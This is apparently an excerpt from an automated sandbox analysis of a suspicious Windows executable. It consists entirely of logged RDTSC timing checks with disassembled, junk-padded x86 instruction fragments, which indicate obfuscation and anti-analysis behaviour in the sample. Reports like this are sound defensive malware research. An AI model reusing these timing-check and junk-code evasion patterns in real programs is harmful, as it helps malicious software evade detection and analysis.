              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DD5D second address: F7DD73 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DD73 second address: F7DE14 instructions: 0x00000000 rdtsc 0x00000002 js 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jl 00007F646C53F7BFh 0x00000015 pop eax 0x00000016 mov ecx, 3EAEA466h 0x0000001b movsx esi, si 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F646C53F7A8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jnp 00007F646C53F7B2h 0x00000040 je 00007F646C53F7ACh 0x00000046 mov dword ptr [ebp+122D36D2h], ebx 0x0000004c mov dword ptr [ebp+122D3866h], eax 0x00000052 push 00000000h 0x00000054 add edi, 76A36F16h 0x0000005a push 00000003h 0x0000005c or dword ptr [ebp+122D1854h], edi 0x00000062 push 73BD0919h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a pushad 0x0000006b popad 0x0000006c jbe 00007F646C53F7A6h 0x00000072 popad 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DE14 second address: F7DE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD14785h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DE2D second address: F7DE91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 4C42F6E7h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F646C53F7A8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c add dword ptr [ebp+122D219Dh], edi 0x00000032 lea ebx, dword ptr [ebp+124496F3h] 0x00000038 jbe 00007F646C53F7ACh 0x0000003e sub ecx, dword ptr [ebp+122D3CA8h] 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F646C53F7ABh 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DE91 second address: F7DEA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F7DEA0 second address: F7DEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F64FC1 second address: F64FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F646CD1477Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F64FCE second address: F64FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F646C53F7B3h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9B9A4 second address: F9B9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C0EA second address: F9C0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C0EE second address: F9C0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C3DE second address: F9C3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C3E7 second address: F9C3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F646CD1477Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C3F6 second address: F9C402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C402 second address: F9C40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C6DA second address: F9C6ED instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646C53F7A6h 0x00000008 jc 00007F646C53F7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C835 second address: F9C839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C839 second address: F9C83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F912A0 second address: F912A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6B9BC second address: F6B9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7B3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6B9D3 second address: F6BA18 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14776h 0x00000008 jnc 00007F646CD14776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F646CD1478Fh 0x0000001e jns 00007F646CD1477Eh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9CF62 second address: F9CF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9CF66 second address: F9CF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F646CD14776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F646CD14788h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007F646CD14776h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69EB1 second address: F69EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69EB6 second address: F69ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007F646CD14776h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 je 00007F646CD14776h 0x00000017 pop edi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69ECE second address: F69EE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F646C53F7A6h 0x00000009 pop ebx 0x0000000a jo 00007F646C53F7ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA0FBC second address: FA1005 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F646CD14787h 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F646CD1477Ch 0x00000019 jmp 00007F646CD14789h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA1005 second address: FA100F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA77EE second address: FA77F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA805B second address: FA807E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F646C53F7A8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6D597 second address: F6D59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA72E second address: FAA77A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646C53F7AEh 0x00000008 jmp 00007F646C53F7B5h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F646C53F7A6h 0x00000019 jmp 00007F646C53F7B8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA8D2 second address: FAA8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F646CD14776h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA8DD second address: FAA8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAB12B second address: FAB131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACC54 second address: FACC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACC59 second address: FACCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646CD14776h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F646CD1478Ch 0x00000017 jmp 00007F646CD14786h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F646CD14786h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACCA0 second address: FACCD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646C53F7B2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F646C53F7B7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACCD8 second address: FACCE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F646CD14776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACFD2 second address: FACFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACFD6 second address: FACFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD8F0 second address: FAD8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD8F5 second address: FAD935 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F646CD14778h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, edx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD935 second address: FAD93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADCB4 second address: FADCB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADCB8 second address: FADCCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADE0B second address: FADE10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC74 second address: FAEC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEB98 second address: FAEB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC78 second address: FAEC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC82 second address: FAECA8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F646CD14790h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F646CD14782h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAECA8 second address: FAED21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add di, 2586h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F646C53F7A8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3DD0h] 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+122D21A4h] 0x00000036 call 00007F646C53F7B7h 0x0000003b push edi 0x0000003c mov esi, 2EF364E3h 0x00000041 pop edi 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 jmp 00007F646C53F7B6h 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAED21 second address: FAED26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB06F2 second address: FB073D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx edi, si 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F646C53F7A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b stc 0x0000002c adc esi, 77A14A0Ah 0x00000032 mov dword ptr [ebp+122D1D8Eh], ebx 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB073D second address: FB0747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1C6E second address: FB1CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F646C53F7ACh 0x0000000c jg 00007F646C53F7A6h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F646C53F7A8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D1D8Eh], edx 0x00000034 push 00000000h 0x00000036 xor si, 75BBh 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e cmc 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 push edx 0x00000042 pushad 0x00000043 jl 00007F646C53F7A6h 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c pop edx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1CC7 second address: FB1CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1CCB second address: FB1CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32CC second address: FB32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32D0 second address: FB32D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32D6 second address: FB32E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F646CD14778h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E1C second address: FB4E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB3AE5 second address: FB3AEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E20 second address: FB4E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E2D second address: FB4E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E32 second address: FB4E39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E39 second address: FB4E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F646CD1477Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB80FC second address: FB8115 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F646C53F7ABh 0x0000000b jnp 00007F646C53F7ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F75A7C second address: F75A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB9DBC second address: FB9DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F646C53F7ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE41 second address: FBAE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE45 second address: FBAE4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE4B second address: FBAE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBAE51 second address: FBAE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDAB second address: FBBDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDB1 second address: FBBDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDB5 second address: FBBDDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub dword ptr [ebp+122D319Eh], edi 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D207Ch], edx 0x00000017 push 00000000h 0x00000019 sbb ebx, 0AF0F0ADh 0x0000001f mov bl, ch 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pushad 0x00000026 popad 0x00000027 pop esi 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBDDD second address: FBBDEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBF30 second address: FBBF3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
